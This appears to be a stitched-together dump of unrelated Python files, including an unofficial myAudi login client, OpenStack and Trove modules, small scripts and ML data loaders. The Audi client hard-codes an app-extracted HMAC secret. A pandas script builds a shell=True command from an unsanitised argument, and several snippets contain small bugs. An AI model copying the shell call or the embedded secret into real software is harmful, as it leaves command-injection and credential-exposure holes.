self, url: str, action: str, successCode: str, failedCode: str, path: str
):
for _ in range(MAX_RESPONSE_ATTEMPTS):
await asyncio.sleep(REQUEST_STATUS_SLEEP)
self._api.use_token(self.vwToken)
res = await self._api.get(url)
status = get_attr(res, path)
if status is None or (failedCode is not None and status == failedCode):
raise Exception(
"Cannot {action}, return code '{code}'".format(
action=action, code=status
)
)
if status == successCode:
return
raise Exception("Cannot {action}, operation timed out".format(action=action))
# TR/2022-02-17: New secrect for X_QMAuth
def _calculate_X_QMAuth(self):
# Calcualte X-QMAuth value
gmtime_100sec = int(
(datetime.utcnow() - datetime(1970, 1, 1)).total_seconds() / 100
)
xqmauth_secret = bytes([55,24,256-56,256-96,256-72,256-110,57,256-87,3,256-86,256-41,256-103,33,256-30,99,103,81,125,256-39,256-39,71,18,256-107,256-112,256-120,256-12,256-104,89,103,113,256-128,256-91])
xqmauth_val = hmac.new(
xqmauth_secret,
str(gmtime_100sec).encode("ascii", "ignore"),
digestmod="sha256",
).hexdigest()
return "v1:55f755b0:" + xqmauth_val
# TR/2021-12-01: Refresh token before it expires
# returns True when refresh was required and succesful, otherwise False
async def refresh_token_if_necessary(self, elapsed_sec: int) -> bool:
if self.mbboauthToken is None:
return False
if "refresh_token" not in self.mbboauthToken:
return False
if "expires_in" not in self.mbboauthToken:
return False
if (elapsed_sec + 5 * 60) < self.mbboauthToken["expires_in"]:
# refresh not needed now
return False
try:
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/x-www-form-urlencoded",
"X-Client-ID": self.xclientId,
}
mbboauth_refresh_data = {
"grant_type": "refresh_token",
"token": self.mbboauthToken["refresh_token"],
"scope": "sc2:fal",
# "vin": vin, << App uses a dedicated VIN here, but it works without, don't know
}
encoded_mbboauth_refresh_data = urlencode(mbboauth_refresh_data, encoding="utf-8").replace("+", "%20")
mbboauth_refresh_rsp, mbboauth_refresh_rsptxt = await self._api.request(
"POST",
self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
encoded_mbboauth_refresh_data,
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
# this code is the old "vwToken"
self.vwToken = json.loads(mbboauth_refresh_rsptxt)
# TR/2022-02-10: If a new refresh_token is provided, save it for further refreshes
if "refresh_token" in self.vwToken:
self.mbboauthToken["refresh_token"] = self.vwToken["refresh_token"]
# hdr
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-QMAuth": self._calculate_X_QMAuth(),
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/x-www-form-urlencoded",
}
# IDK token request data
tokenreq_data = {
"client_id": self._client_id,
"grant_type": "refresh_token",
"refresh_token": self._bearer_token_json.get("refresh_token"),
"response_type": "token id_token",
}
# IDK token request
encoded_tokenreq_data = urlencode(tokenreq_data, encoding="utf-8").replace("+","%20")
bearer_token_rsp, bearer_token_rsptxt = await self._api.request(
"POST",
self._tokenEndpoint,
encoded_tokenreq_data,
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
self._bearer_token_json = json.loads(bearer_token_rsptxt)
# AZS token
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-App-Version": AudiAPI.HDR_XAPP_VERSION,
"X-App-Name": "myAudi",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/json; charset=utf-8",
}
asz_req_data = {
"token": self._bearer_token_json["access_token"],
"grant_type": "id_token",
"stage": "live",
"config": "myaudi",
}
azs_token_rsp, azs_token_rsptxt = await self._api.request(
"POST",
self._authorizationServerBaseURLLive + "/token",
json.dumps(asz_req_data),
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
azs_token_json = json.loads(azs_token_rsptxt)
self.audiToken = azs_token_json
return True
except Exception as exception:
_LOGGER.error("Refresh token failed: " + str(exception))
return False
# TR/2021-12-01 updated to match behaviour of Android myAudi 4.5.0
async def login_request(self, user: str, password: str):
self._api.use_token(None)
self._api.set_xclient_id(None)
self.xclientId = None
# get markets
markets_json = await self._api.request(
"GET",
"https://content.app.my.audi.com/service/mobileapp/configurations/markets",
None,
)
if (
self._country.upper()
not in markets_json["countries"]["countrySpecifications"]
):
raise Exception("Country not found")
self._language = markets_json["countries"]["countrySpecifications"][
self._country.upper()
]["defaultLanguage"]
# Dynamic configuration URLs
marketcfg_url = "https://content.app.my.audi.com/service/mobileapp/configurations/market/{c}/{l}?v=4.6.0".format(
c=self._country, l=self._language
)
openidcfg_url = "https://idkproxy-service.apps.{0}.vwapps.io/v1/{0}/openid-configuration".format(
"na" if self._country.upper() == "US" else "emea")
# get market config
marketcfg_json = await self._api.request("GET", marketcfg_url, None)
# use dynamic config from marketcfg
self._client_id = "09b6cbec-cd19-4589-82fd-363dfa8c24da@apps_vw-dilab_com"
if "idkClientIDAndroidLive" in marketcfg_json:
self._client_id = marketcfg_json["idkClientIDAndroidLive"]
self._authorizationServerBaseURLLive = "https://aazsproxy-service.apps.emea.vwapps.io"
if "authorizationServerBaseURLLive" in marketcfg_json:
self._authorizationServerBaseURLLive = marketcfg_json[
"authorizationServerBaseURLLive"
]
self.mbbOAuthBaseURL = "https://mbboauth-1d.prd.ece.vwg-connect.com/mbbcoauth"
if "mbbOAuthBaseURLLive" in marketcfg_json:
self.mbbOAuthBaseURL = marketcfg_json["mbbOAuthBaseURLLive"]
# get openId config
openidcfg_json = await self._api.request("GET", openidcfg_url, None)
# use dynamic config from openId config
authorization_endpoint = "https://identity.vwgroup.io/oidc/v1/authorize"
if "authorization_endpoint" in openidcfg_json:
authorization_endpoint = openidcfg_json["authorization_endpoint"]
self._tokenEndpoint = "https://idkproxy-service.apps.emea.vwapps.io/v1/emea/token"
if "token_endpoint" in openidcfg_json:
self._tokenEndpoint = openidcfg_json["token_endpoint"]
revocation_endpoint = (
"https://idkproxy-service.apps.emea.vwapps.io/v1/emea/revoke"
)
if revocation_endpoint in openidcfg_json:
revocation_endpoint = openidcfg_json["revocation_endpoint"]
# generate code_challenge
code_verifier = str(base64.urlsafe_b64encode(os.urandom(32)), "utf-8").strip(
"="
)
code_challenge = str(
base64.urlsafe_b64encode(
sha256(code_verifier.encode("ascii", "ignore")).digest()
),
"utf-8",
).strip("=")
code_challenge_method = "S256"
#
state = str(uuid.uuid4())
nonce = str(uuid.uuid4())
# login page
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-App-Version": AudiAPI.HDR_XAPP_VERSION,
"X-App-Name": "myAudi",
"User-Agent": AudiAPI.HDR_USER_AGENT,
}
idk_data = {
"response_type": "code",
"client_id": self._client_id,
"redirect_uri": "myaudi:///",
"scope": "address profile badge birthdate birthplace nationalIdentifier nationality profession email vin phone nickname name picture mbb gallery openid",
"state": state,
"nonce": nonce,
"prompt": "login",
"code_challenge": code_challenge,
"code_challenge_method": code_challenge_method,
"ui_locales": "de-de de",
}
idk_rsp, idk_rsptxt = await self._api.request(
"GET",
authorization_endpoint,
None,
headers=headers,
params=idk_data,
rsp_wtxt=True,
)
# form_data with email
submit_data = self.get_hidden_html_input_form_data(idk_rsptxt, {"email": user})
submit_url = self.get_post_url(idk_rsptxt, authorization_endpoint)
# send email
email_rsp, email_rsptxt = await self._api.request(
"POST",
submit_url,
submit_data,
headers=headers,
cookies=idk_rsp.cookies,
allow_redirects=True,
rsp_wtxt=True,
)
# form_data with password
# 2022-01-29: new HTML response uses a js two build the html form data + button.
# Therefore it's not possible to extract hmac and other form data.
# --> extract hmac from embedded js snippet.
regex_res = re.findall('"hmac"\s*:\s*"[0-9a-fA-F]+"', email_rsptxt)
if regex_res:
submit_url = submit_url.replace("identifier", "authenticate")
submit_data["hmac"] = regex_res[0].split(":")[1].strip('"')
submit_data["password"] = password
else:
submit_data = self.get_hidden_html_input_form_data(email_rsptxt, {"password": password})
submit_url = self.get_post_url(email_rsptxt, submit_url)
# send password
pw_rsp, pw_rsptxt = await self._api.request(
"POST",
submit_url,
submit_data,
headers=headers,
cookies=idk_rsp.cookies,
allow_redirects=False,
rsp_wtxt=True,
)
# forward1 after pwd
fwd1_rsp, fwd1_rsptxt = await self._api.request(
"GET",
pw_rsp.headers["Location"],
None,
headers=headers,
cookies=idk_rsp.cookies,
allow_redirects=False,
rsp_wtxt=True,
)
# forward2 after pwd
fwd2_rsp, fwd2_rsptxt = await self._api.request(
"GET",
fwd1_rsp.headers["Location"],
None,
headers=headers,
cookies=idk_rsp.cookies,
allow_redirects=False,
rsp_wtxt=True,
)
# get tokens
codeauth_rsp, codeauth_rsptxt = await self._api.request(
"GET",
fwd2_rsp.headers["Location"],
None,
headers=headers,
cookies=fwd2_rsp.cookies,
allow_redirects=False,
rsp_wtxt=True,
)
authcode_parsed = urlparse(
codeauth_rsp.headers["Location"][len("myaudi:///?") :]
)
authcode_strings = parse_qs(authcode_parsed.path)
# hdr
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-QMAuth": self._calculate_X_QMAuth(),
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/x-www-form-urlencoded",
}
# IDK token request data
tokenreq_data = {
"client_id": self._client_id,
"grant_type": "authorization_code",
"code": authcode_strings["code"][0],
"redirect_uri": "myaudi:///",
"response_type": "token id_token",
"code_verifier": code_verifier,
}
# IDK token request
encoded_tokenreq_data = urlencode(tokenreq_data, encoding="utf-8").replace("+","%20")
bearer_token_rsp, bearer_token_rsptxt = await self._api.request(
"POST",
self._tokenEndpoint,
encoded_tokenreq_data,
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
self._bearer_token_json = json.loads(bearer_token_rsptxt)
# AZS token
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-App-Version": AudiAPI.HDR_XAPP_VERSION,
"X-App-Name": "myAudi",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/json; charset=utf-8",
}
asz_req_data = {
"token": self._bearer_token_json["access_token"],
"grant_type": "id_token",
"stage": "live",
"config": "myaudi",
}
azs_token_rsp, azs_token_rsptxt = await self._api.request(
"POST",
self._authorizationServerBaseURLLive + "/token",
json.dumps(asz_req_data),
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
azs_token_json = json.loads(azs_token_rsptxt)
self.audiToken = azs_token_json
# mbboauth client register
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/json; charset=utf-8",
}
mbboauth_reg_data = {
"client_name": "SM-A405FN",
"platform": "google",
"client_brand": "Audi",
"appName": "myAudi",
"appVersion": AudiAPI.HDR_XAPP_VERSION,
"appId": "de.myaudi.mobile.assistant",
}
mbboauth_client_reg_rsp, mbboauth_client_reg_rsptxt = await self._api.request(
"POST",
self.mbbOAuthBaseURL + "/mobile/register/v1",
json.dumps(mbboauth_reg_data),
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
mbboauth_client_reg_json = json.loads(mbboauth_client_reg_rsptxt)
self.xclientId = mbboauth_client_reg_json["client_id"]
self._api.set_xclient_id(self.xclientId)
# mbboauth auth
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/x-www-form-urlencoded",
"X-Client-ID": self.xclientId,
}
mbboauth_auth_data = {
"grant_type": "id_token",
"token": self._bearer_token_json["id_token"],
"scope": "sc2:fal",
}
encoded_mbboauth_auth_data = urlencode(mbboauth_auth_data, encoding="utf-8").replace("+","%20")
mbboauth_auth_rsp, mbboauth_auth_rsptxt = await self._api.request(
"POST",
self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
encoded_mbboauth_auth_data,
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
mbboauth_auth_json = json.loads(mbboauth_auth_rsptxt)
# store token and expiration time
self.mbboauthToken = mbboauth_auth_json
# mbboauth refresh (app immediately refreshes the token)
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Content-Type": "application/x-www-form-urlencoded",
"X-Client-ID": self.xclientId,
}
mbboauth_refresh_data = {
"grant_type": "refresh_token",
"token": mbboauth_auth_json["refresh_token"],
"scope": "sc2:fal",
# "vin": vin, << App uses a dedicated VIN here, but it works without, don't know
}
encoded_mbboauth_refresh_data = urlencode(mbboauth_refresh_data, encoding="utf-8").replace("+","%20")
mbboauth_refresh_rsp, mbboauth_refresh_rsptxt = await self._api.request(
"POST",
self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
encoded_mbboauth_refresh_data,
headers=headers,
allow_redirects=False,
cookies=mbboauth_client_reg_rsp.cookies,
rsp_wtxt=True,
)
# this code is the old "vwToken"
self.vwToken = json.loads(mbboauth_refresh_rsptxt)
def _generate_security_pin_hash(self, challenge):
pin = to_byte_array(self._spin)
byteChallenge = to_byte_array(challenge)
b = bytes(pin + byteChallenge)
return sha512(b).hexdigest().upper()
async def _emulate_browser(
self, reply: BrowserLoginResponse, form_data: Dict[str, str]
) -> BrowserLoginResponse:
# The reply redirects to the login page
login_location = reply.get_location()
page_reply = await self._api.get(login_location, raw_contents=True)
# Now parse the html body and extract the target url, csrf token and other required parameters
html = BeautifulSoup(page_reply, "html.parser")
form_tag = html.find("form")
form_inputs = html.find_all("input", attrs={"type": "hidden"})
for form_input in form_inputs:
name = form_input.get("name")
form_data[name] = form_input.get("value")
# Extract the target url
action = form_tag.get("action")
if action.startswith("http"):
# Absolute url
username_post_url = action
elif action.startswith("/"):
# Relative to domain
username_post_url = BrowserLoginResponse.to_absolute(login_location, action)
else:
raise RequestException("Unknown form action: " + action)
headers = {"referer": login_location}
reply = await self._api.post(
username_post_url,
form_data,
headers=headers,
use_json=False,
raw_reply=True,
allow_redirects=False,
)
return BrowserLoginResponse(reply, username_post_url)
|
#!/usr/bin/env python2
# -*- encoding: utf-8 -*-
import csv
import sys
from BeautifulSoup import BeautifulSoup
from urllib2 import urlopen
try:
f = urlopen(sys.argv[1])
except urllib2.HTTPError:
f = open(sys.argv[1])
soup = BeautifulSoup(f)
tables = soup.findAll('table')
idx = 0
for table in tables:
headers = [header.text for header in table.findAll('th')]
rows = []
for row in table.findAll('tr'):
rows.append([val.text.encode('utf8') for val in row.findAll('td')])
with open('out' + str(idx) + '.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerow(headers)
writer.writerows(row for row in rows if row)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from keystone.contrib.extensions.admin.extension import BaseExtensionHandler
from keystone.controllers.endpointtemplates import EndpointTemplatesController
class ExtensionHandler(BaseExtensionHandler):
def map_extension_methods(self, mapper):
#EndpointTemplates Calls
endpoint_templates_controller = EndpointTemplatesController()
mapper.connect("/OS-KSCATALOG/endpointTemplates",
controller=endpoint_templates_controller,
action="get_endpoint_templates",
conditions=dict(method=["GET"]))
mapper.connect("/OS-KSCATALOG/endpointTemplates",
controller=endpoint_templates_controller,
action="add_endpoint_template",
conditions=dict(method=["POST"]))
mapper.connect(
"/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
controller=endpoint_templates_controller,
action="get_endpoint_template",
conditions=dict(method=["GET"]))
mapper.connect(
"/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
controller=endpoint_templates_controller,
action="modify_endpoint_template",
conditions=dict(method=["PUT"]))
mapper.connect(
"/OS-KSCATALOG/endpointTemplates/{endpoint_template_id}",
controller=endpoint_templates_controller,
action="delete_endpoint_template",
conditions=dict(method=["DELETE"]))
#Endpoint Calls
mapper.connect("/tenants/{tenant_id}/OS-KSCATALOG/endpoints",
controller=endpoint_templates_controller,
action="get_endpoints_for_tenant",
conditions=dict(method=["GET"]))
mapper.connect("/tenants/{tenant_id}/OS-KSCATALOG/endpoints",
controller=endpoint_templates_controller,
action="add_endpoint_to_tenant",
conditions=dict(method=["POST"]))
mapper.connect(
"/tenants/{tenant_id}/OS-KSCATALOG/endpoints/{endpoint_id}",
controller=endpoint_templates_controller,
action="remove_endpoint_from_tenant",
conditions=dict(method=["DELETE"]))
|
import pandas as pd
import sys
import os
import re
import shutil
import subprocess
inputs=sys.argv[1]
output=sys.argv[2]
df = pd.read_csv(inputs, sep=",", header=None, names=["Username","Hostname"])
df.to_csv("csv-intermediate-file-csv", index=False)
def csvtomd(output):
return subprocess.Popen(
'csvtomd csv-intermediate-file-csv > {}; rm csv-intermediate-file-csv; pandoc -o users.html {}'.format(output, output),
stdout=subprocess.PIPE, shell=True)
csvtomd(output)
|
from mopidy_vfd import Extension
def test_get_default_config():
ext = Extension()
config = ext.get_default_config()
assert "[vfd]" in config
assert "enabled = true" in config
def test_get_config_schema():
ext = Extension()
schema = ext.get_config_schema()
assert "display" in schema
|
# Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from novaclient import exceptions as nova_exceptions
from oslo_log import log as logging
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import remote
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
@property
def cluster_class(self):
return GaleraCommonCluster
@property
def cluster_view_class(self):
return GaleraCommonClusterView
@property
def mgmt_cluster_view_class(self):
return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
@staticmethod
def _validate_cluster_instances(context, instances, datastore,
datastore_version):
"""Validate the flavor and volume"""
ds_conf = CONF.get(datastore_version.manager)
num_instances = len(instances)
# Check number of instances is at least min_cluster_member_count
if num_instances < ds_conf.min_cluster_member_count:
raise exception.ClusterNumInstancesNotLargeEnough(
num_instances=ds_conf.min_cluster_member_count)
# Checking volumes and get delta for quota check
cluster_models.validate_instance_flavors(
context, instances, ds_conf.volume_support, ds_conf.device_path)
req_volume_size = cluster_models.get_required_volume_size(
instances, ds_conf.volume_support)
cluster_models.assert_homogeneous_cluster(instances)
deltas = {'instances': num_instances, 'volumes': req_volume_size}
# quota check
check_quotas(context.tenant, deltas)
# Checking networks are same for the cluster
instance_nics = []
for instance in instances:
nics = instance.get('nics')
if nics:
instance_nics.append(nics[0].get('net-id'))
if len(set(instance_nics)) > 1:
raise exception.ClusterNetworksNotEqual()
if not instance_nics:
return
instance_nic = instance_nics[0]
try:
nova_client = remote.create_nova_client(context)
nova_client.networks.get(instance_nic)
except nova_exceptions.NotFound:
raise exception.NetworkNotFound(uuid=instance_nic)
@staticmethod
def _create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration_id):
member_config = {"id": db_info.id,
"instance_type": "member"}
name_index = 1
for instance in instances:
if not instance.get("name"):
instance['name'] = "%s-member-%s" % (db_info.name,
str(name_index))
name_index += 1
return [Instance.create(context,
instance['name'],
instance['flavor_id'],
datastore_version.image_id,
[], [],
datastore, datastore_version,
instance.get('volume_size', None),
None,
availability_zone=instance.get(
'availability_zone', None),
nics=instance.get('nics', None),
configuration_id=configuration_id,
cluster_config=member_config,
modules=instance.get('modules'),
locality=locality,
region_name=instance.get('region_name')
)
for instance in instances]
@classmethod
def create(cls, context, name, datastore, datastore_version,
instances, extended_properties, locality, configuration):
LOG.debug("Initiating Galera cluster creation.")
cls._validate_cluster_instances(context, instances, datastore,
datastore_version)
# Updating Cluster Task
db_info = cluster_models.DBCluster.create(
name=name, tenant_id=context.tenant,
datastore_version_id=datastore_version.id,
task_status=ClusterTasks.BUILDING_INITIAL,
configuration_id=configuration)
cls._create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration)
# Calling taskmanager to further proceed for cluster-configuration
task_api.load(context, datastore_version.manager).create_cluster(
db_info.id)
return cls(context, db_info, datastore, datastore_version)
def grow(self, instances):
LOG.debug("Growing cluster %s." % self.id)
self.validate_cluster_available()
context = self.context
db_info = self.db_info
datastore = self.ds
datastore_version = self.ds_version
db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
try:
locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
configuration_id = self.db_info.configuration_id
new_instances = self._create_instances(
context, db_info, datastore, datastore_version, instances,
None, locality, configuration_id)
task_api.load(context, datastore_version.manager).grow_cluster(
db_info.id, [instance.id for instance in new_instances])
except Exception:
db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(context, db_info,
datastore, datastore_version)
def shrink(self, instances):
"""Removes instances from a cluster."""
LOG.debug("Shrinking cluster %s." % self.id)
self.validate_cluster_available()
removal_instances = [Instance.load(self.context, inst_id)
for inst_id in instances]
db_instances = DBInstance.find_all(cluster_id=self.db_info.id).all()
if len(db_instances) - len(removal_instances) < 1:
raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
try:
task_api.load(self.context, self.ds_version.manager
).shrink_cluster(self.db_info.id,
[instance.id
for instance in removal_instances])
except Exception:
self.db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(self.context, self.db_info,
self.ds, self.ds_version)
def restart(self):
self.rolling_restart()
def upgrade(self, datastore_version):
self.rolling_upgrade(datastore_version)
def configuration_attach(self, configuration_id):
self.rolling_configuration_update(configuration_id)
def configuration_detach(self):
self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
class GaleraCommonMgmtClusterView(MgmtClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
|
import torch
import torchvision
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from torchvision.utils import save_image
from model import DeblurCNN, get_model
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
def util(model):
criterion = nn.MSELoss()
optimizer = optim.Adam([
{'params': model.conv1.parameters()},
{'params': model.conv2.parameters()},
{'params': model.conv3.parameters()}], lr=0.001)
'''
optimizer = optim.Adam([
{'params': model.encoder.parameters()},
{'params': model.decoder.parameters()}], lr=0.001)
'''
return criterion, optimizer
def fit(model, dataloader, train_data, epoch):
"""
Train the model
Args:
model ([nn.Module]): [DeblurCNN model]
dataloader ([torch.utils.data]): [Load training dataset]
epoch ([int]): [Number of epochs to train the model]
Returns:
[float]: [Training loss]
"""
criterion, optimizer = util(model)
model.train()
running_loss = 0.0
for i, data in tqdm(enumerate(dataloader), total=int(len(train_data)/dataloader.batch_size)):
blur_image = data[0]
sharp_image = data[1]
blur_image = blur_image.to(device)
sharp_image = sharp_image.to(device)
optimizer.zero_grad()
outputs = model(blur_image)
loss = criterion(outputs, sharp_image)
# backpropagation
loss.backward()
# update the parameters
optimizer.step()
running_loss += loss.item()
train_loss = running_loss/len(dataloader.dataset)
print(f"Train Loss: {train_loss:.5f}")
return train_loss
def save_decoded_image(img, name):
img = img.view(img.size(0), 3, 1024, 1024)
save_image(img, name)
def validate(model, dataloader, val_data, epoch):
"""
Neural model validation
Args:
model ([nn.Module]): [DeblurCNN model]
dataloader ([torch.utils.data]): [Load validation dataset]
epoch ([int]): [Number of epochs to train the neural model]
Returns:
[float]: [Validation loss]
"""
criterion, optimizer = util(model)
model.eval()
running_loss = 0.0
with torch.no_grad():
for i, data in tqdm(enumerate(dataloader), total=int(len(val_data)/dataloader.batch_size)):
blur_image = data[0]
sharp_image = data[1]
blur_image = blur_image.to(device)
sharp_image = sharp_image.to(device)
outputs = model(blur_image)
loss = criterion(outputs, sharp_image)
running_loss += loss.item()
val_loss = running_loss/len(dataloader.dataset)
print(f"Val Loss: {val_loss:.5f}")
save_decoded_image(outputs.cpu().data, name=f"../outputs/saved_images/val_deblurred{epoch}.jpg")
return val_loss |
import cv2
class Camera(object):
""" Camera object for capturing pictures and video"""
def __init__(self, camera, dimmensions):
"""
Initializes a class instance
Args:
camera: n'th camera (zero indexed)
width: width of image [pixels]
height: height of image [pixels]
Returns:
none
"""
self.camera = cv2.VideoCapture(camera)
width, height = dimmensions
self.camera.set(3, width)
self.camera.set(4, height)
def get_img(self):
"""
Detects and calculates position of an aruco marker
Args:
none
Returns:
img: image
Raises:
CameraError: image could not be taken
"""
ret, img = self.camera.read()
if ret:
return img
else:
raise Exception('CameraError') |
class Solution(object):
def longestCommonPrefix(self, strs):
"""
:type strs: List[str]
:rtype: str
"""
if not strs:
return ""
min_length = min([len(x) for x in strs])
for l in range(0, min_length):
for s in strs:
if s[l] != strs[0][l]:
return strs[0][:l]
return strs[0][:min_length]
|
import os
import numpy as np
from PIL import Image
import chainer
from chainer.dataset import dataset_mixin
class Cifar10Dataset(dataset_mixin.DatasetMixin):
def __init__(self, test=False):
d_train, d_test = chainer.datasets.get_cifar10(ndim=3, withlabel=False, scale=1.0)
if test:
self.ims = d_test
else:
self.ims = d_train
self.ims = self.ims * 2 - 1.0 # [-1.0, 1.0]
print("load cifar-10. shape: ", self.ims.shape)
def __len__(self):
return self.ims.shape[0]
def get_example(self, i):
return self.ims[i]
def image_to_np(img, dtype):
img = img.convert('RGB')
img = np.asarray(img, dtype=np.uint8)
img = img.transpose((2, 0, 1)).astype(dtype)
if img.shape[0] == 1:
img = np.broadcast_to(img, (3, img.shape[1], img.shape[2]))
img = (img - 127.5)/127.5
return img
def preprocess_image(img, crop_width=256, img2np=True):
wid = min(img.size[0], img.size[1])
ratio = crop_width / wid + 1e-4
img = img.resize((int(ratio * img.size[0]), int(ratio * img.size[1])), Image.BILINEAR)
x_l = (img.size[0]) // 2 - crop_width // 2
x_r = x_l + crop_width
y_u = 0
y_d = y_u + crop_width
img = img.crop((x_l, y_u, x_r, y_d))
if img2np:
img = image_to_np(img)
return img
def find_all_files(directory):
"""http://qiita.com/suin/items/cdef17e447ceeff6e79d"""
for root, dirs, files in os.walk(directory):
yield root
for file in files:
yield os.path.join(root, file)
class ImageDataset(dataset_mixin.DatasetMixin):
def __init__(self, root, one_class_flag=False, dtype=None, label_dtype=np.int32):
extensions = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
if one_class_flag:
classes = [os.path.basename(root)]
class_to_idx = {}
self.pairs = self._make_one_class_dataset(root, extensions)
else:
classes, class_to_idx = self._find_classes(root)
self.pairs = self._make_dataset(root, class_to_idx, extensions)
if len(self.pairs) == 0:
raise(RuntimeError("Found 0 files in subfolders of: " + root + "\n"
"Supported extensions are: " + ",".join(extensions)))
self.root = root
self.extensions = extensions
self.classes = classes
self.class_to_idx = class_to_idx
# self._dtype = chainer.get_dtype(dtype)
self._dtype = np.float32
self._label_dtype = label_dtype
def __len__(self):
return len(self.pairs)
def get_example(self, i):
path, int_label = self.pairs[i]
img = Image.open(path)
img = image_to_np(img, self._dtype)
# label = np.array(int_label, dtype=self._label_dtype)
return img#, label
def _make_dataset(self, dir, class_to_idx, extensions):
images = []
dir = os.path.expanduser(dir)
for target in sorted(class_to_idx.keys()):
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
if self._has_file_allowed_extension(fname, extensions):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
images.append(item)
return images
def _make_one_class_dataset(self, dir, extensions):
data_list = []
dir = os.path.expanduser(dir)
assert os.path.isdir(dir), '{} in make_dataset function is not directory'.format(dir)
for root, _, fnames in sorted(os.walk(dir)):
for fname in sorted(fnames):
if self._has_file_allowed_extension(fname, extensions):
path = os.path.join(root, fname)
item = (path, 0)
data_list.append(item)
return data_list
def _has_file_allowed_extension(self, filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in extensions)
def _find_classes(self, dir):
"""
Finds the class folders in a dataset.
Args:
dir (string): Root directory path.
Returns:
tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.
Ensures:
No class is a subdirectory of another.
"""
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
class ImagenetDataset(dataset_mixin.DatasetMixin):
def __init__(self, file_list, crop_width=256):
self.crop_width = crop_width
self.image_files = file_list
print(len(self.image_files))
def __len__(self):
return len(self.image_files)
def get_example(self, i):
np.random.seed()
img = None
while img is None:
# print(i,id)
try:
fn = "%s" % (self.image_files[i])
img = Image.open(fn)
except Exception as e:
print(i, fn, str(e))
return preprocess_image(img, crop_width=self.crop_width)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.